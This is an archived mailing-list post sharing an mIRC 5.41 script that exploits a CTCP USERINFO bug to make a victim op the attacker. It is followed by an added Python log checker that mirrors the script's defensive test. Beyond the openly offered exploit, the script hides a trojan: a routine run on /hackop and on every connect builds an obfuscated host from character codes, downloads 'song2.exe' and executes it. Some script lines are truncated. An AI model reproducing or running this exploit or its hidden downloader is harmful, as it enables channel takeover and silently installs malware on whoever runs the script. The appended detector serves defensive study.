Hi, while debugging/hexing/disassembling mIRC my friend slotmech last week found a mIRC bug which allows forcing users to send MODE commands to the server. This example script sends a MODE +o to the IRC server. The mIRC author has been notified of this but we didn't receive a response... my exploit+protection script is included. Expect more mIRC stuff from us.

cya, fs

--- cut here ---
;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private>
;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$
;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$
;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;
;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$
;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$
;#;
;#; if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick
    .halt
  }
}

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
    .halt
  }
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
    .halt
  }
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
    .halt
  }
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $
}

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
  .sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$
}

on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$
  .sockwrite -n protx
}

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test
}

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  }
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  }
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  }
}
unset %xinprog
unset %xfilename
unset %xlof
unset %xfirst
}
--- cut here ---
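As an added example (not part of the original post, and not FeaRStorm's code): the only defensive piece of the script above is the antihack alias, whose test is $len($2) > 17 && $chr(91) isin $2-, i.e. the first word after USERINFO is longer than 17 characters and a "[" appears anywhere in the arguments. The Python below applies that same check outside mIRC, for instance to a bouncer or IRC log, so an operator can count or alert on such CTCP USERINFO requests. The sample lines, the regular expression and the function names are constructed for this example. The checklen alias and the protx socket handlers, which fetch a file and run it, are a separate part of the script and are not reproduced here.

```python
import re

# Constructed sample IRC traffic (not taken from the post): a normal CTCP
# USERINFO request, an unrelated CTCP, a request shaped like the one the
# antihack alias rejects, and a plain channel message.
SAMPLE_LINES = [
    ":alice!u@host PRIVMSG bob :\x01USERINFO\x01",
    ":alice!u@host PRIVMSG bob :\x01VERSION\x01",
    ":mallory!u@host PRIVMSG bob :\x01USERINFO $xxxxxxxxxxxxxxxxxxxxxxxx [ +o mallory\x01",
    ":carol!u@host PRIVMSG #chan :hello there",
]

# A CTCP request is a PRIVMSG whose trailing parameter is wrapped in \x01.
# The command is the first word inside the markers; everything after the
# first space (if any) is the argument string.
CTCP_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :"
    r"\x01(?P<cmd>[^\x01\s]+)(?: (?P<args>[^\x01]*))?\x01$"
)


def parse_ctcp(line):
    """Return {nick, target, cmd, args} for a CTCP request line, else None."""
    m = CTCP_RE.match(line)
    if not m:
        return None
    return {
        "nick": m.group("nick"),
        "target": m.group("target"),
        "cmd": m.group("cmd").upper(),
        "args": m.group("args") or "",
    }


def is_suspicious_userinfo(args, max_len=17):
    """Mirror the antihack alias: $2 (first argument word) longer than
    max_len and $chr(91), i.e. '[', present anywhere in $2-."""
    first_word = args.split(" ", 1)[0] if args else ""
    return len(first_word) > max_len and "[" in args


def scan(lines):
    """Return the parsed CTCP USERINFO requests that trip the check."""
    hits = []
    for line in lines:
        ctcp = parse_ctcp(line)
        if ctcp and ctcp["cmd"] == "USERINFO" and is_suspicious_userinfo(ctcp["args"]):
            hits.append(ctcp)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("oversized CTCP USERINFO from %s to %s: %r" % (hit["nick"], hit["target"], hit["args"]))
```

The check is deliberately the same one the post ships, so it flags exactly what the antihack alias would; a CTCP USERINFO with no arguments, or a long argument without a "[", passes just as it does in the mIRC version.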
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:15 PDT